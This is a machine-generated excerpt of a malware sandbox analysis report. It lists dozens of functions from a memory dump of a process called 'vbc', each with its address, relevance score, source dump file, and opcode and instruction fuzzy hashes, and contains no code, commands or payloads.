                                                                                                                        • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                        • Instruction Fuzzy Hash: 57014C7160815567DF299BA5C906BAFFFA9EB80B90F14C01DE9075B284D774EC90C3E1
                                                                                                                        Function 05326DF6 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0ea7aea65a6251a99741f0e0251a9a3c87569e5845a4365786bffa75e9b04c6e
                                                                                                                        • Instruction ID: edd402dcf055505690e77dcfd70484040c02147ab4c5cb3bbe939e68c5baba75
                                                                                                                        • Opcode Fuzzy Hash: 0ea7aea65a6251a99741f0e0251a9a3c87569e5845a4365786bffa75e9b04c6e
                                                                                                                        • Instruction Fuzzy Hash: 5401F532714712ABCB18BA659C45AB77BA9FF84210B400528F94587A90DF61FC10CBE0
                                                                                                                        Function 053C6500 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8650f7f1a890ffac43a6bfc2e4741a44f35b386f701d1ca4dc5680b81d8b843d
                                                                                                                        • Instruction ID: 3a7ecd8cdc8cbe9c0d3a8e08336ab56a8593002118c4c28475b91cbf9b98dc9c
                                                                                                                        • Opcode Fuzzy Hash: 8650f7f1a890ffac43a6bfc2e4741a44f35b386f701d1ca4dc5680b81d8b843d
                                                                                                                        • Instruction Fuzzy Hash: 7511C4326441459FC710CF5DD801BA6BBBAFB5A314F188199E849CF315D732EC80CBA0
                                                                                                                        Function 053B6050 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 67b5a8bda06400d744a97c8cec2cc1df8fcaf0205d5f7fbd8db99bdca96a9732
                                                                                                                        • Instruction ID: bdf8ba5d0edaa55b217798e2a2a075d3dfef463b3a8344d3636ca75d30da28ad
                                                                                                                        • Opcode Fuzzy Hash: 67b5a8bda06400d744a97c8cec2cc1df8fcaf0205d5f7fbd8db99bdca96a9732
                                                                                                                        • Instruction Fuzzy Hash: 7E11297390001DABCB25DB95CC85DEFBBBDEF48258F044166E906E7211EA34EA54CBE0
                                                                                                                        Function 0533208A Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                        • Instruction ID: 61dcb966e186e288d1ab52c353c1f63ffeb22e4f8b97fc0fb59cec2005821209
                                                                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                        • Instruction Fuzzy Hash: 870124362002108BDF15AA29D880FA7776BBFC4700F1A44E9FD028F255EAB1D885C790
                                                                                                                        Function 05404D30 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff14778d6b1c68ec6a34b312da2c215263b81f8fda94997f749facd12e1f02b8
                                                                                                                        • Instruction ID: 34668284610c660029db0e557ada2b099fd212c91e8931f3f3b86ab447f544ed
                                                                                                                        • Opcode Fuzzy Hash: ff14778d6b1c68ec6a34b312da2c215263b81f8fda94997f749facd12e1f02b8
                                                                                                                        • Instruction Fuzzy Hash: CC019A32A10158ABCF21EFA9DD45EEFBFB9EB48650F450069F905E3251CA30DA11CBA0
                                                                                                                        Function 0536E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6808e14aab2de3ec3e731a0110c59607ab5e1fe891d5c83760bd050572f5961e
                                                                                                                        • Instruction ID: 2891fd70478b807307c926f1be8c6fba6fb668213ec3f9c6587d0922377da69a
                                                                                                                        • Opcode Fuzzy Hash: 6808e14aab2de3ec3e731a0110c59607ab5e1fe891d5c83760bd050572f5961e
                                                                                                                        • Instruction Fuzzy Hash: 0F018F72301A54BBC211BB69CD88E57BBECFF856A0B00062AB50597A61DB74FC11CAA4
                                                                                                                        Function 0532C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                        • Instruction ID: d3c2abc15f6cf372529cd343553caa62dd43d81c7a4928352e885465c6d2ad01
                                                                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                        • Instruction Fuzzy Hash: 65012D32200B04AFDB22E665C404EB773EEFFC4250F04981EA5468B940DFB0E845CB51
                                                                                                                        Function 053720F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 974d3e3c8e7f50b035cd5a2e6adecb401534922e408389ee21c5a4a2992e9bb0
                                                                                                                        • Instruction ID: 12f6a65f560bc9ff9cc381bc35c7d5185ece8cabab95ef835c3a1aa4bb85c5c3
                                                                                                                        • Opcode Fuzzy Hash: 974d3e3c8e7f50b035cd5a2e6adecb401534922e408389ee21c5a4a2992e9bb0
                                                                                                                        • Instruction Fuzzy Hash: 4C116D35A0020DEBDF15EF64C855EAE7BBAFB48240F004059F90197250DB39AE11CB90
                                                                                                                        Function 053BC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 099e6e71acb9d9679d75a45d4938facc70ea9f188e6a5b0a709491e04ace77d7
                                                                                                                        • Instruction ID: 01915de7bc8308a1f5271cec92a6a74f6fe40d60c78b08f84e68ee9713526204
                                                                                                                        • Opcode Fuzzy Hash: 099e6e71acb9d9679d75a45d4938facc70ea9f188e6a5b0a709491e04ace77d7
                                                                                                                        • Instruction Fuzzy Hash: 22115B71A0020DEBDF26EF64C854EEE7BB5FB48240F004059F90197740DA74EE11CB91
                                                                                                                        Function 0534E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                        • Instruction ID: 6c89905e58d9247068c23e103787ece771c1cf07c27e5b9ce5609afe7227901f
                                                                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                        • Instruction Fuzzy Hash: E8017C322046809FD326D65EC948F3677DDFF45B50F0904A1E916CBA91D6B8EC40CA22
                                                                                                                        Function 0532826B Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6e3397506d4d380d16d4f9044fceaa4c923e36307320fbd794b8a33dc3af70ad
                                                                                                                        • Instruction ID: a63ef89c1e0659dbf87432667352b41a9a77b1440af6bb40b87b6d6109a3636e
                                                                                                                        • Opcode Fuzzy Hash: 6e3397506d4d380d16d4f9044fceaa4c923e36307320fbd794b8a33dc3af70ad
                                                                                                                        • Instruction Fuzzy Hash: 8C01F731B00B28DBD718EBA9D8549EFB7B9EF40210F5541299906A7A40EE70DD01CA90
                                                                                                                        Function 053B4C0F Relevance: .0, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f317aba9fec8c309a81813ca9706c17126bc757283e52f2929622a8cc9aec083
                                                                                                                        • Instruction ID: accbd46164553562b907c1cf127923305240b92dd1e7778d7eaaba2d1ec8fbc7
                                                                                                                        • Opcode Fuzzy Hash: f317aba9fec8c309a81813ca9706c17126bc757283e52f2929622a8cc9aec083
                                                                                                                        • Instruction Fuzzy Hash: 8801A772B10325ABDF219F99D9C5BEABBFDAB84B50F510025F60497201DBF0DD448754
                                                                                                                        Function 05332582 Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 06b024286a4f54ac6c7b0b23f6aecee915f4d11e83206ed4362767bee41d69ca
                                                                                                                        • Instruction ID: bbd73cd0546eebaf791a2e028348038e8ff0b9ff150cdbaafc46994e20c314cc
                                                                                                                        • Opcode Fuzzy Hash: 06b024286a4f54ac6c7b0b23f6aecee915f4d11e83206ed4362767bee41d69ca
                                                                                                                        • Instruction Fuzzy Hash: FAF0F432B41B20B7C731DB568C45F57BAEEEB84B90F104428B60597640DA70ED01CBA0
                                                                                                                        Function 05404F68 Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3d1c7cb1cf0cc6d391904c56c9ec873b5a670607c1af7314fa88de85fd9bd6fc
                                                                                                                        • Instruction ID: 770b0ed6e32fd1effa333a1333bb0533968b9e4cd4d17101349e5ebcad2a7a60
                                                                                                                        • Opcode Fuzzy Hash: 3d1c7cb1cf0cc6d391904c56c9ec873b5a670607c1af7314fa88de85fd9bd6fc
                                                                                                                        • Instruction Fuzzy Hash: 9401D7B1A1021DABDB04DFA9D9459DEBBF8FF48304F10446AA901E7380D674AA018BA5
                                                                                                                        Function 0535C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                        • Instruction ID: efb43151f7fdabdacc30b9f356178b565ed6b54b237ba43237f29ddebc087dd9
                                                                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                        • Instruction Fuzzy Hash: 1CF062B3A00615ABD334DF4DDC40E57F7EAEBC4A94F058129A955DB220EA71ED05CB90
                                                                                                                        Function 0540634F Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 853bd5b29733c82e4efb7431505f27616bde73100db9842590bffb86141ed9fa
                                                                                                                        • Instruction ID: b5bb0db1cc66ba0edd7eaeafbaddcffa0087ae832212917b402e0c861de5c4a4
                                                                                                                        • Opcode Fuzzy Hash: 853bd5b29733c82e4efb7431505f27616bde73100db9842590bffb86141ed9fa
                                                                                                                        • Instruction Fuzzy Hash: AA012171E1020DEBDB04DFA9D55599EB7F8FF48304F10406AF905E7390D678AA019BA1
                                                                                                                        Function 0532C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                        • Instruction ID: e0d555b45b6f058703d26bb885653a1b3eb04a934df9d8d400fbc611bf32bb77
                                                                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                        • Instruction Fuzzy Hash: 05F0FC73348E36BBC73366994844BAFA69A9FC5AA4F191435E3099B604CAA8CC0257D0
                                                                                                                        Function 0540625D Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f63b412d98020726835fdbc31c83c7d931607ee4fa575a44f81a6255bddaaa82
                                                                                                                        • Instruction ID: b77cd6f583e8c7dd37248930498193d68d906d190d29a8b55aa9fe7d4eec94d6
                                                                                                                        • Opcode Fuzzy Hash: f63b412d98020726835fdbc31c83c7d931607ee4fa575a44f81a6255bddaaa82
                                                                                                                        • Instruction Fuzzy Hash: DB012C71E1021DEBCB04EFA9D555AAEB7F8EF48304F10406AF905E7391D678AA018BA1
                                                                                                                        Function 054062D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c25fd89422f72ca58fafa7253a9cd7b34690424680d10721326e11779e376528
                                                                                                                        • Instruction ID: fe4ca322f060d0c3b64617c828cfaa649eb8cc9238bb23763c0deaf10d0fab02
                                                                                                                        • Opcode Fuzzy Hash: c25fd89422f72ca58fafa7253a9cd7b34690424680d10721326e11779e376528
                                                                                                                        • Instruction Fuzzy Hash: FE012C71E1020DEBDB04DFA9D445AAEBBF8EF48304F50446AF915E7390DA74AA018BA1
                                                                                                                        Function 05404FE7 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4d66ca4d334e7a5b25cb20a0e76e17afd5b1eaa3e814c597085577e68babdf3f
                                                                                                                        • Instruction ID: 177779c63d52163c07af7c2039d4f5bc58a8a5d6016d5b00964b93302d64d735
                                                                                                                        • Opcode Fuzzy Hash: 4d66ca4d334e7a5b25cb20a0e76e17afd5b1eaa3e814c597085577e68babdf3f
                                                                                                                        • Instruction Fuzzy Hash: 74012171A1020DABDB04DFA9D9859DEBBF8FF48344F50445AF501E7380D634EA018BA1
                                                                                                                        Function 054061E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c4abefee39e4e2ba2431c996d4d50e35d970d2669f5dded1e42dceffdc48022d
                                                                                                                        • Instruction ID: bde095a0d00779663c4dad57e3a73503f7cd262fb5bde935a0bf0b4fd8563d41
                                                                                                                        • Opcode Fuzzy Hash: c4abefee39e4e2ba2431c996d4d50e35d970d2669f5dded1e42dceffdc48022d
                                                                                                                        • Instruction Fuzzy Hash: ED012C71A10259ABDB14EFA9D845AEEBBF8AF48310F14406AE501A7280DB74AA01CB95
                                                                                                                        Function 053B63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                        • Instruction ID: 681617fa4fe958e569cf8b22ab3b68ab5da11be33a636d82187ca2af140ab845
                                                                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                        • Instruction Fuzzy Hash: 9CF0307220401DBFEF02AF95DD81DEF7BBDEF492E8B104125FA1196160D671DD21ABA0
                                                                                                                        Function 053BA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 913f0142016490005e2c98851678958558b14250af5dd3fdf19f5d2f2adc1920
                                                                                                                        • Instruction ID: 2ce8225b06dcba4e459b15c965c67aea1df8587fb109ac61846a36e156dc0a13
                                                                                                                        • Opcode Fuzzy Hash: 913f0142016490005e2c98851678958558b14250af5dd3fdf19f5d2f2adc1920
                                                                                                                        • Instruction Fuzzy Hash: C7019736510619ABDF129F84DC41EDE7FAAFB4C764F068102FE1966620C672DA70EF81
                                                                                                                        Function 0536656A Relevance: .0, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f601ec51a7c75384f5e97d74bce84b0b55cf433de3b71fcb1bf2927ed359cb13
                                                                                                                        • Instruction ID: 8da8109c002c57aee97388bb3f16a95408fab063eefd3d1e169a4d096652b4ee
                                                                                                                        • Opcode Fuzzy Hash: f601ec51a7c75384f5e97d74bce84b0b55cf433de3b71fcb1bf2927ed359cb13
                                                                                                                        • Instruction Fuzzy Hash: 5001A4713086849FE7369768CD4EF6537E9FB40B80F488598BA028BAD5EBE8E4418610
                                                                                                                        Function 0532C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ad319d4b9f057a46e805cfe6d765234f4ed60db2d099847d0b6c147b2e948e15
                                                                                                                        • Instruction ID: bccba17981a3ede87b77a803a5f86bb35a85c679237ca31b7b8abbecbfb12c52
                                                                                                                        • Opcode Fuzzy Hash: ad319d4b9f057a46e805cfe6d765234f4ed60db2d099847d0b6c147b2e948e15
                                                                                                                        • Instruction Fuzzy Hash: 04F024713047287BE314961A9C53F7632AAEBC0650F65A02AEA098B6C1E9B0FC01C3E4
                                                                                                                        Function 053D437C Relevance: .0, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                        • Instruction ID: cbf3914abd67b43997465d8f4e70e004b4679db8f41a7568b204459c49ce5c90
                                                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                        • Instruction Fuzzy Hash: C0F08937745A5247DF75AAADA424B2AE2B6BF80950B05852CAC56CB680DFF0D82187A0
                                                                                                                        Function 053B8D20 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e50176ed8b096e4ee06739a937408582f2707926598eac5731c850cf5d0f9d4a
                                                                                                                        • Instruction ID: baebce38790cdc7ac89c7974406df834f85124aa49a1f7d4816a746acf8c354c
                                                                                                                        • Opcode Fuzzy Hash: e50176ed8b096e4ee06739a937408582f2707926598eac5731c850cf5d0f9d4a
                                                                                                                        • Instruction Fuzzy Hash: FEF0E0325142745BE7396A18EC48BE7FB6DFB94710F89041BFD452B5618BF06C80CEA0
                                                                                                                        Function 053347FB Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 60b41a3b95f4d90b73e97a8906813fb68f845f71703779b428e138da43750791
                                                                                                                        • Instruction ID: 19798f2e8b30b02cba2b943d2c21b13650d9f7838200b8d588e007b4af189ed7
                                                                                                                        • Opcode Fuzzy Hash: 60b41a3b95f4d90b73e97a8906813fb68f845f71703779b428e138da43750791
                                                                                                                        • Instruction Fuzzy Hash: CAF0B4359167D09FDF33CB58C45DF6277D9AB00760F08896AD48E8F541D7B5D881CA50
                                                                                                                        Function 053F0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fc7ccc825bdb2fdc0d2d2be089811640748edc437f4b06782835d5da40140667
                                                                                                                        • Instruction ID: 1a70666f565bd2f0a668f6ffa8309f080be0e103d12b42a21317c8551f933a69
                                                                                                                        • Opcode Fuzzy Hash: fc7ccc825bdb2fdc0d2d2be089811640748edc437f4b06782835d5da40140667
